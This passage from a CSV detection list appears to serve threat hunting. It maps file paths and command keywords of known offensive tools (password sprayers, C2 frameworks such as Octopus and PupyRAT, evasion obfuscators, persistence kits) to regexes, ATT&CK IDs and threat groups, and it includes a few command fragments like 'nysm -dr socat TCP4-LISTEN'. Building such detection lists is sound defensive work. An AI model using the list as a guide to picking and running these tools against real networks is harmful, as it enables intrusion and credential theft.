"*/nullinux.git*",".{0,1000}\/nullinux\.git.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","1","#linux","N/A","7","6","575","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z","9321" "*/nullinux.py*",".{0,1000}\/nullinux\.py.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","1","#linux","N/A","7","6","575","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z","9322" "*/nullinux_users.txt*",".{0,1000}\/nullinux_users\.txt.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","#linux","N/A","7","6","575","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z","9323" "*/nxc --help*",".{0,1000}\/nxc\s\-\-help.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","9324" "*/nxc.exe*",".{0,1000}\/nxc\.exe.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing 
the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","9325" "*/nxc/parsers/ip.py*",".{0,1000}\/nxc\/parsers\/ip\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","9326" "*/nxc/parsers/nmap.py*",".{0,1000}\/nxc\/parsers\/nmap\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","9327" "*/nxc-ubuntu-latest*",".{0,1000}\/nxc\-ubuntu\-latest.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","9328" "*/nysm bash*",".{0,1000}\/nysm\sbash.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1057 - T1570","TA0005 - TA0002 - TA0008","N/A","N/A","Defense 
Evasion","https://github.com/eeriedusk/nysm","1","0","#linux","N/A","10","3","246","39","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z","9329" "*/nysm -dr socat TCP4-LISTEN*",".{0,1000}\/nysm\s\-dr\ssocat\sTCP4\-LISTEN.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1057 - T1570","TA0005 - TA0002 - TA0008","N/A","N/A","Defense Evasion","https://github.com/eeriedusk/nysm","1","0","#linux","N/A","10","3","246","39","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z","9330" "*/nysm -r ssh *@*",".{0,1000}\/nysm\s\-r\sssh\s.{0,1000}\@.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1057 - T1570","TA0005 - TA0002 - TA0008","N/A","N/A","Defense Evasion","https://github.com/eeriedusk/nysm","1","0","#linux","N/A","10","3","246","39","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z","9331" "*/nysm.bpf.c*",".{0,1000}\/nysm\.bpf\.c.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1057 - T1570","TA0005 - TA0002 - TA0008","N/A","N/A","Defense Evasion","https://github.com/eeriedusk/nysm","1","0","#linux","N/A","10","3","246","39","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z","9332" "*/nysm.git*",".{0,1000}\/nysm\.git.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1057 - T1570","TA0005 - TA0002 - TA0008","N/A","N/A","Defense Evasion","https://github.com/eeriedusk/nysm","1","1","N/A","N/A","10","3","246","39","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z","9333" "*/o365_enum_activesync.py*",".{0,1000}\/o365_enum_activesync\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","1","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","9334" 
"*/o365_enum_office.py*",".{0,1000}\/o365_enum_office\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","1","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","9335" "*/o365_enum_onedrive.py*",".{0,1000}\/o365_enum_onedrive\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","1","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","9336" "*/o365_spray_activesync.py*",".{0,1000}\/o365_spray_activesync\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","1","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","9337" "*/o365_spray_adfs.py*",".{0,1000}\/o365_spray_adfs\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","1","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","9338" "*/o365_spray_msol.py*",".{0,1000}\/o365_spray_msol\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential 
Access","https://github.com/0xZDH/Omnispray","1","1","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","9339" "*/o365recon.git*",".{0,1000}\/o365recon\.git.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","1","N/A","N/A","7","8","715","103","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z","9340" "*/o365spray.git*",".{0,1000}\/o365spray\.git.{0,1000}","offensive_tool_keyword","o365spray","Username enumeration and password spraying tool aimed at Microsoft O365","T1110.003 - T1087.002","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/0xZDH/o365spray","1","1","N/A","N/A","8","9","846","100","2024-11-06T00:49:23Z","2019-08-07T14:47:45Z","9341" "*/o365spray.py*",".{0,1000}\/o365spray\.py.{0,1000}","offensive_tool_keyword","o365spray","Username enumeration and password spraying tool aimed at Microsoft O365","T1110.003 - T1087.002","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/0xZDH/o365spray","1","1","N/A","N/A","8","9","846","100","2024-11-06T00:49:23Z","2019-08-07T14:47:45Z","9342" "*/oab-parse/mspack.*.dll*",".{0,1000}\/oab\-parse\/mspack\..{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - 
T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","9343" "*/obfs3/obfs3.py*",".{0,1000}\/obfs3\/obfs3\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","9344" "*/obfuscate_strings.py*",".{0,1000}\/obfuscate_strings\.py.{0,1000}","offensive_tool_keyword","macro_pack","The 
macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","9345" "*/obfuscated_scripts/*",".{0,1000}\/obfuscated_scripts\/.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","9346" "*/Obfuscated-Code.py*",".{0,1000}\/Obfuscated\-Code\.py.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","1","N/A","N/A","8","10","4","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z","9347" "*/ObfuscatedSharpCollection.git*",".{0,1000}\/ObfuscatedSharpCollection\.git.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","9348" "*/obfuscation.exe 
--help*",".{0,1000}\/obfuscation\.exe\s\-\-help.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","9349" "*/Obfuscator.py*",".{0,1000}\/Obfuscator\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","9350" "*/Obfuscator.py*",".{0,1000}\/Obfuscator\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","9351" "*/obfuscator/obfuscator.*",".{0,1000}\/obfuscator\/obfuscator\..{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","N/A","10","10","1808","267","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z","9352" "*/octopus.asm*",".{0,1000}\/octopus\.asm.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","9353" "*/Octopus.git*",".{0,1000}\/Octopus\.git.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","9354" "*/octopusx64.asm*",".{0,1000}\/octopusx64\.asm.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","9355" "*/OffensiveCpp.git*",".{0,1000}\/OffensiveCpp\.git.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","1","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","9356" "*/OffensiveCSharp.git*",".{0,1000}\/OffensiveCSharp\.git.{0,1000}","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","9357" "*/OffensiveCSharp/*",".{0,1000}\/OffensiveCSharp\/.{0,1000}","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","9358" "*/OffensiveLua.git*",".{0,1000}\/OffensiveLua\.git.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","9359" "*/Offensive-Netsh-Helper.git*",".{0,1000}\/Offensive\-Netsh\-Helper\.git.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","1","N/A","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z","9360" "*/OffensiveNotion.git",".{0,1000}\/OffensiveNotion\.git","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","N/A","10","10","1161","130","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z","9361" "*/OffensiveNotion/agent*",".{0,1000}\/OffensiveNotion\/agent.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking 
app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","N/A","10","10","1161","130","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z","9362" "*/OffensiveNotion/osxcross/target/bin*",".{0,1000}\/OffensiveNotion\/osxcross\/target\/bin.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","N/A","10","10","1161","130","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z","9363" "*/OffensiveNotion/utils*",".{0,1000}\/OffensiveNotion\/utils.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","0","#linux","N/A","10","10","1161","130","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z","9364" "*/office2john.py*",".{0,1000}\/office2john\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","9365" "*/OfficeInjector.exe*",".{0,1000}\/OfficeInjector\.exe.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","1","N/A","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","9366" 
"*/Office-Persistence.git*",".{0,1000}\/Office\-Persistence\.git.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","1","N/A","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z","9367" "*/OfficePersistence.ps1*",".{0,1000}\/OfficePersistence\.ps1.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","1","N/A","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z","9368" "*/Office-Persistence/master/calc.ppa*",".{0,1000}\/Office\-Persistence\/master\/calc\.ppa.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","1","N/A","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z","9369" "*/OG-Sadpanda/*",".{0,1000}\/OG\-Sadpanda\/.{0,1000}","offensive_tool_keyword","cobaltstrike",".NET Assembly to Retrieve Outlook Calendar Details","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/OG-Sadpanda/SharpCalendar","1","1","N/A","N/A","10","10","13","1","2021-10-07T19:42:20Z","2021-10-07T17:11:46Z","9371" "*/Oh365UserFinder*",".{0,1000}\/Oh365UserFinder.{0,1000}","offensive_tool_keyword","Oh365UserFinder","Oh365UserFinder is used for identifying valid o365 accounts and domains without the risk of account lockouts. The tool parses responses to identify the IfExistsResult flag is null or not. and responds appropriately if the user is valid. The tool will attempt to identify false positives based on response. and either automatically create a waiting period to allow the throttling value to reset. 
or warn the user to increase timeouts between attempts.","T1595 - T1592 - T1589 - T1591 - T1598","TA0004 - TA0005 - TA0010","N/A","N/A","Reconnaissance","https://github.com/dievus/Oh365UserFinder","1","1","N/A","N/A","N/A","6","539","94","2025-01-23T19:50:46Z","2021-11-16T22:59:04Z","9372" "*/oh365userfinder.py*",".{0,1000}\/oh365userfinder\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","9373" "*/OJ/gobuster*",".{0,1000}\/OJ\/gobuster.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","1","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","9374" "*/omg-payloads.git*",".{0,1000}\/omg\-payloads\.git.{0,1000}","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","9375" "*/Omnispray.git*",".{0,1000}\/Omnispray\.git.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","1","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","9376" "*/omnispray.py*",".{0,1000}\/omnispray\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration 
and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","1","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","9377" "*/omp2-brute.nse*",".{0,1000}\/omp2\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9378" "*/omp2-enum-targets.nse*",".{0,1000}\/omp2\-enum\-targets\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9379" "*/omron-info.nse*",".{0,1000}\/omron\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
